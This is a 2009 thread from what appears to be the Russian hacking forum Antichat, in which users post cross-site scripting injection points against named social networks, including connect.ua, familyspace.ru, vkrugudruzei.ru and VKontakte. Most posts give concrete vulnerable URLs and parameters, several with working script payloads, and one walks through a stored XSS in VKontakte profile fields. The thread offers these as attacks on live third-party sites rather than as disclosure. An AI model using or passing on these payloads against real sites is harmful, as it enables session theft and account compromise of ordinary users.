Уязвимости в соц. сетях

Discussion in 'Социальные сети' started by .:EnoT:., 20 Jan 2009.

  1. .:EnoT:.

    .:EnoT:. Сексуальное чудовище

    Joined:
    29 May 2007
    Messages:
    803
    Likes Received:
    559
    Reputations:
    50
    По многочисленным просьбам пользователей и одного из модераторов раздела Уязвимостей создана данная тема.

    Теперь все уязвимости постим в этой теме. Отдельно созданные темы будут удаляться!
     
    #1 .:EnoT:., 20 Jan 2009
  2. Shadow_p1raT

    Shadow_p1raT Elder - Старейшина

    Joined:
    9 Mar 2008
    Messages:
    174
    Likes Received:
    93
    Reputations:
    0
    Буду пейвым

    connect.ua

    ХSS в панели Фотография

    Code:
    http://connect.ua/v2/profile?edit&photo&error=[B][XSS][/B]
    XSS в Поиске

    Code:
    http://connect.ua/v2/search?users=&q=">[B][XSS][/B]
    Ну и на десерт XSS в Личных сообщениях,поле Тема
    Текст темы:

    Code:
    </title>[B][XSS][/B]
    А вообще ксс там повсюду.Интересно какую тарву курили разработчики:)
     
    #2 Shadow_p1raT, 20 Jan 2009
  3. Shadow_p1raT

    Shadow_p1raT Elder - Старейшина

    Joined:
    9 Mar 2008
    Messages:
    174
    Likes Received:
    93
    Reputations:
    0
    Familyspace.ru

    XSS в Поиске

    Code:
    http://www.familyspace.ru/index.php?page=search&pn=1&first_nam=">[B][XSS][/B]
    XSS при просмотре профиля
    Code:
    http://www.familyspace.ru/index.php?page=profile&user_id=[B][тут id пользователя][/B][B][XSS][/B]
    Пример
    Code:
    http://www.familyspace.ru/index.php?page=profile&user_id=75212<script>alert()</script>
    А тут сходу 2 XSS уязвимая переменная message и from_page

    Code:
    http://www.familyspace.ru/index.php?page=edit_profile&message=">[B][XSS][/B]&from_page=">[B][XSS][/B]
    Пример:
    Code:
    http://www.familyspace.ru/index.php?page=edit_profile&message="><script>alert(1)</script>&from_page="><script>alert(2)</script>
    Наверно разработчики предыдущего проекта поделились травой с этими:)
     
    #3 Shadow_p1raT, 20 Jan 2009
  4. s0l_ir0n

    s0l_ir0n Active Member

    Joined:
    14 Mar 2009
    Messages:
    399
    Likes Received:
    144
    Reputations:
    18
    http://majormo.ru
    XSS в статусе. (выставляется через настройки профайла)
     
    #4 s0l_ir0n, 21 Mar 2009
  5. Failure

    Failure Elder - Старейшина

    Joined:
    21 Sep 2008
    Messages:
    179
    Likes Received:
    46
    Reputations:
    16
    Code:
    http://vkrugudruzei.ru/support/forget.asp?forgetemail=%22%3E%3Cscript%3Ealert(%27xss%27);%3C/script%3E
    только что нашел, что соц. сеть, что хсс :)
     
    #5 Failure, 27 Mar 2009
  6. JOHNik

    JOHNik Member

    Joined:
    21 Apr 2009
    Messages:
    51
    Likes Received:
    14
    Reputations:
    0
    :( все прикрыли тока что! быстро ребята работают!
    для тех кто не вкурил рядом с вкладкой "Личная информация" есть ссылка "[редактировать]"
    Пишем в форму (кроме форм "Любимые цитаты:" и "О себе:" ) например "Любимые фильмы:" [XSS] потом сохраняем
    Появляется ссылка если по ней перейти наша [XSS] оказывается тут:
    Code:
    <script type="text/javascript">
 qCur = 4;
 ge('qinput').value='[XXS]';
 ge('qinput').focus();
 ge('qdrop').innerHTML = qArr[qCur][1];
 sOn = 1;
 newSearch = 1;
 function globalSearch() {
  var force = setCriteria(qArr[qCur][3], ge('qinput').value);
  updateResults(force);
  hide('qfriends');
  qfCur = -1;
  //  ge('qinput').blur();
 }
</script>
    ну сами видите где! (сейчас админы вконтакте подредактировали этот блок, старого у меня не осталось) там то она и работала.
    Я тут новичок, так что если че не так пишите в личку, буду рад =)))
     
    #6 JOHNik, 5 Jun 2009
    Last edited: 5 Jun 2009
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.